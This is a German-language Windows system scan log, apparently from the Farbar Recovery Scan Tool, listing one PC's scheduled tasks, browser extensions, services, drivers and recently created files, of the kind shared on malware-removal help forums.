Task: {1F3544CA-9EFA-426B-8B3D-6DD251BE9242} - System32\Tasks\AviraSystemSpeedupVerify => C:\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe [32819448 2022-07-01] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {272E4CE1-8F68-4EED-BFDF-6E01CFD5CFD6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {2F1B69C1-49C8-41BF-B8A8-7B8B33B47BC5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Update => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {301CE07D-A872-4027-8AAD-8A51F2F0C8A8} - System32\Tasks\Avira_Security_Update => C:\Windows\system32\net.exe [59904 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
Task: {3240C50E-D84D-4B02-9021-A4B8F23E397F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {36B59BFE-92C3-4577-9EB3-A48F37E15056} - System32\Tasks\Opera scheduled assistant Autoupdate 1609849435 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(1): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> FallbackTelemetry
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(2): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> ServiceWatchdog
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(3): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> CrashCollector
Task: {3B74C5CB-076B-4ACD-8A2A-40E25465D4D5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3E333973-E2EA-4CE4-B258-1D35A3344F13} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339120 2021-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {425FFDD3-B209-458B-9A38-8764E722FEA7} - System32\Tasks\Opera scheduled Autoupdate 1609849433 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software)
Task: {4302A2A9-ABB0-4CAB-A43A-120C6F8D8BE2} - System32\Tasks\Avira\System Speedup\Delayed Startup\chris\3 => C:\Users\chris\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
Task: {44B6801D-33B6-4F15-ADA5-F76C4EC8B8F0} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {4FBF287D-3855-45E8-B865-5291BD52CAD0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {514BFB18-1EBB-496F-AF5C-58FD5213D334} - System32\Tasks\Avira\System Speedup\Delayed Startup\chris\2 => C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [4110832 2022-07-06] (Opera Norway AS -> Opera Software)
Task: {529E7201-1539-496A-8FE1-D748E8764182} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\2 => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1313408 2017-07-05] (Canon Inc. -> CANON INC.)
Task: {58DC8299-CE2F-40AB-B652-6335B77E0B7E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {591A781E-5EB7-49FC-ABEF-B22213FC4B88} - System32\Tasks\SS3svc64Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3svc64.exe [811520 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {68E93379-3488-418A-BF23-D339D2B6828B} - System32\Tasks\Avira_Security_Service_SCM_Watchdog => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe [256800 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {83FCF623-1808-4FBD-AD1E-7356AB826511} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8CEF75DB-D658-4A21-9C63-AEDA4DBFFC2D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {92B83629-F377-4970-B04B-2291F6FF0EA6} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\3 => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [68822328 2021-03-09] (Discord Inc. -> Discord Inc.)
Task: {9FD325D7-7CAB-4139-BE9E-656333181255} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {A4D9313F-C284-4987-80C7-F9D78201EB7F} - System32\Tasks\SS3svc32Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {A9A13680-DAAC-4128-B91D-DFD221E78568} - System32\Tasks\Avira\System Speedup\TestScheduler => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [332848 2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
Task: {B2FD02AD-5959-477B-B633-8CDCADA4E7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {C0A61414-43CC-44A1-A233-01EA19897827} - System32\Tasks\Avira_Security_Systray => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe [1642080 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {C1C26AF1-D81F-4EFD-A7F0-0916DF2A7093} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1618593618 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {C5A5E07E-6868-4265-B175-EB2639160ED0} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C93A8B38-65E0-47B2-92AC-F1FB04D75E19} - System32\Tasks\MATLAB R2020b Startup Accelerator => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe [53760 2020-07-29] () [Datei ist nicht signiert]
Task: {D741A068-3D6E-4244-BFA4-F2F9088FE746} - System32\Tasks\Opera GX scheduled Autoupdate 1610475719 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software)
Task: {DD075DC3-40A4-44A3-8123-188C0334D30F} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\1 => C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe [2154696 2020-12-13] (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.)
Task: {E7C6AF9B-6449-4ABE-8F51-977D7F9569DB} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\4 => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {F6A0EEF0-54C6-4191-B0A3-92DC38612038} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F8C2DD18-065A-47DE-B229-1C94A20EF5AE} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F902C571-8663-425B-B606-A4482E01E1EA} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F94F6760-4107-4CA7-AEFB-57E6BD017C78} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Task: C:\Windows\Tasks\MATLAB R2020b Startup Accelerator.job => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{638dd5ca-05dc-4f0a-8232-6b6c4fda51ff}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{da30106f-af18-4b8c-8cce-01f0c7abbe79}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e2fef4cc-039a-4676-8f28-84e9c961b5ec}: [NameServer] 141.44.1.1,141.44.1.2

Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default [2022-07-21]
Edge Extension: (Outlook) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-12-10]
Edge Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\caiblelclndcckfafdaggpephhgfpoip [2022-07-03]
Edge Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\emgfgdclgfeldebanedpihppahgngnle [2022-07-15]
Edge Extension: (Word) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-12-10]
Edge Extension: (Excel) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-12-10]
Edge Extension: (PowerPoint) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-12-10]
Edge HKLM-x32\...\Edge\Extension: [caiblelclndcckfafdaggpephhgfpoip]
Edge HKLM-x32\...\Edge\Extension: [emgfgdclgfeldebanedpihppahgngnle]

FireFox:
========
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2019-07-02] (CANON INC.) [Datei ist nicht signiert]

Chrome: 
=======
CHR Profile: C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default [2022-07-20]
CHR Notifications: Default -> hxxps://web.whatsapp.com
CHR Extension: (Slides) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-12-10]
CHR Extension: (Docs) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-12-10]
CHR Extension: (Google Drive) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-12-10]
CHR Extension: (YouTube) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-12-10]
CHR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2022-06-19]
CHR Extension: (Watch2Gether) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\cimpffimgeipdhnhjohpbehjkcdpjolg [2022-05-18]
CHR Extension: (Sheets) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-12-10]
CHR Extension: (Stylish - Custom themes for any website) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2022-05-18]
CHR Extension: (NordVPN – VPN Proxy for Privacy & Security) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjoaledfpmneenckfbpdfhkmimnjocfa [2022-06-19]
CHR Extension: (Google Docs Offline) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-04-27]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-05-18]
CHR Extension: (Excel Online) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\iljnkagajgfdmfnnidjijobijlfjfgnb [2020-12-10]
CHR Extension: (Cashback service LetyShops) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2022-06-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-12-10]
CHR Extension: (De-Fakeator) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pldoiobdcjagdiiphgfmbggpgmhkkaff [2020-12-10]
CHR HKLM\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]

Opera: 
=======
OPR Profile: C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable [2022-07-21]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\dalelnnofafalcmkmnhdbigbjjkloabo [2021-01-05]
OPR Extension: (Rich Hints Agent) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-01-05]
OPR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\ngohaaocccbohaffogpbgfpmpgbcgccg [2021-01-05]
OPR Extension: (Free Avira Phantom VPN – Entsperrt Webseiten) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\pcgkmkjdikhiodinhloioejnpjgmfigd [2021-01-05]
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1001) Opera GXStable - "C:\Users\chris\AppData\Local\Programs\Opera GX\Launcher.exe"
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1006) Opera GXStable - "C:\Users\Lisa\AppData\Local\Programs\Opera GX\Launcher.exe"

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [768408 2022-07-20] (ASUSTeK Computer Inc. -> )
R2 AviraOptimizerHost; C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe [3000608 2022-03-25] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe [386864 2022-03-30] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraSecurity; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe [264400 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
S2 AviraSecurityUpdater; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Common.Updater.exe [282464 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
R2 EndpointProtectionService; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 EndpointProtectionService2; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [342456 2020-12-08] (FUTUREMARK INC -> Futuremark)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [445432 2021-04-19] (Canon Inc. -> )
R2 nordvpn-service; C:\Program Files\NordVPN\nordvpn-service.exe [280440 2021-06-05] (nordvpn s.a. -> TEFINCOM S.A.)
S3 OVRLibraryService; C:\Program Files\Oculus\Support\oculus-librarian\OVRLibraryService.exe [148064 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 OVRService; C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe [514656 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2022-03-17] (Even Balance, Inc. -> )
R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [2028568 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [461336 2021-11-30] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1349688 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
R2 Razer Synapse Service; D:\Synapse3\Service\Razer Synapse Service.exe [298056 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [533824 2022-02-18] (Razer USA Ltd. -> Razer Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 BdSentry; C:\Windows\System32\DRIVERS\BdSentry.sys [230520 2022-06-21] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 NDivert; C:\Program Files\NordVPN\Drivers\NDivert.sys [128856 2021-06-09] (nordvpn s.a. -> Nordvpn S.A.)
R1 netprotection_network_filter; C:\Windows\System32\drivers\netprotection_network_filter.sys [100128 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 netprotection_network_filter2; C:\Windows\System32\drivers\netprotection_network_filter2.sys [100376 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 nlwt; C:\Windows\system32\DRIVERS\nlwt.sys [39360 2020-12-10] (TEFINCOM S.A. -> WireGuard LLC)
R1 nordlwf; C:\Windows\system32\DRIVERS\nordlwf.sys [38608 2020-10-14] (TEFINCOM S.A. -> TEFINCOM S.A.)
R3 oculusvad_oculusvad; C:\Windows\System32\drivers\oculusvad.sys [75280 2022-03-02] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R3 Oculus_ViGEmBus; C:\Windows\System32\drivers\Oculus_ViGEmBus.sys [32856 2022-03-02] (Oculus VR, LLC -> Facebook Inc.)
S0 rtp_elam; C:\Windows\System32\DRIVERS\rtp_elam.sys [24024 2022-06-30] (Microsoft Windows Early Launch Anti-Malware Publisher -> Avira Operations GmbH)
R2 rtp_filesystem_filter; C:\Windows\System32\DRIVERS\rtp_filesystem_filter.sys [202584 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_process_monitor; C:\Windows\system32\DRIVERS\rtp_process_monitor.sys [193304 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_traverse; C:\Windows\system32\DRIVERS\rtp_traverse.sys [47560 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R3 RzCommon; C:\Windows\System32\drivers\RzCommon.sys [54632 2021-03-30] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_0065; C:\Windows\System32\drivers\RzDev_0065.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167280 2020-11-11] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapnordvpn; C:\Windows\System32\drivers\tapnordvpn.sys [44896 2020-06-09] (TEFINCOM S.A. -> The OpenVPN Project)
R1 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.)
R3 vmulti; C:\Windows\System32\drivers\vmulti.sys [19600 2020-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49576 2022-07-14] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [452856 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [91384 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\Windows\system32\DRIVERS\wintun.sys [29680 2021-10-07] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-21 11:52 - 2022-07-21 11:52 - 000000000 ____D C:\AdwCleaner
2022-07-21 11:51 - 2022-07-21 11:51 - 008551608 _____ (Malwarebytes) C:\Users\chris\Desktop\adwcleaner.exe
2022-07-20 22:19 - 2022-07-21 12:19 - 000000000 ____D C:\Users\chris\Downloads\FRST
2022-07-20 16:58 - 2022-07-20 16:58 - 000157105 _____ C:\Users\chris\Downloads\rechnung-FM.F22014940233.pdf
2022-07-19 12:28 - 2022-07-21 12:20 - 000000000 ____D C:\FRST
2022-07-17 21:40 - 2022-07-17 21:40 - 2467378443 _____ C:\Windows\MEMORY.DMP
2022-07-17 21:40 - 2022-07-17 21:40 - 005480100 _____ C:\Windows\Minidump\071722-8656-01.dmp
2022-07-14 23:16 - 2022-07-14 23:24 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2022-07-14 23:15 - 2022-07-14 23:15 - 000000000 ____D C:\Windows\pss
2022-07-14 19:43 - 2022-06-15 09:28 - 000100376 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter2.sys
2022-07-14 18:27 - 2022-07-14 18:27 - 000003888 _____ C:\Windows\system32\Tasks\Avira_Security_Maintenance
2022-07-14 18:27 - 2022-07-14 18:27 - 000003428 _____ C:\Windows\system32\Tasks\Avira_Security_Service_SCM_Watchdog
2022-07-14 17:50 - 2022-07-14 17:50 - 000693248 _____ C:\Windows\system32\FsNVSDeviceSource.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000530944 _____ (curl, hxxps://curl.se/) C:\Windows\system32\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000470528 _____ (curl, hxxps://curl.se/) C:\Windows\SysWOW64\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000270848 _____ C:\Windows\system32\EsclScan.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000152064 _____ C:\Windows\system32\EsclProtocol.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000018944 _____ C:\Windows\SysWOW64\WsdProviderUtil.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000011811 _____ C:\Windows\system32\DrtmAuthTxt.wim
